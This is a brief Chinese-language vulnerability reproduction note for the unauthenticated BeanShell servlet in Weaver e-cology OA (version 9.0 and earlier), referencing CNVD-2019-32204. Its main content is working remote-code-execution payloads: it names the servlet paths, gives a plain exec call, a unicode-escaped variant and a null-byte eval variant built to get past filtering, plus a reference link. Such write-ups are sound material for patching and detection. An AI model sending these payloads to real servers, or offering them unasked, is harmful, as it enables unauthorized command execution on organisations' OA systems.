0x00 漏洞原理
該漏洞位于 e-cology OA系統(tǒng)BeanShell組件中,并且該組件允許未授權(quán)訪問,攻擊者可通過訪問該組件執(zhí)行任意的Java代碼,導(dǎo)致遠(yuǎn)程命令執(zhí)行。
0x01影響版本
泛微 e-cology<=9.0
0x02復(fù)現(xiàn)
可能的路徑
/weaver/bsh.servlet.BshServlet
/weaveroa/bsh.servlet.BshServlet
/oa/bsh.servlet.BshServlet
payload:
bsh.script=exec("whoami");&bsh.servlet.output=raw
bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

image.png

image.png
0x03參考
https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204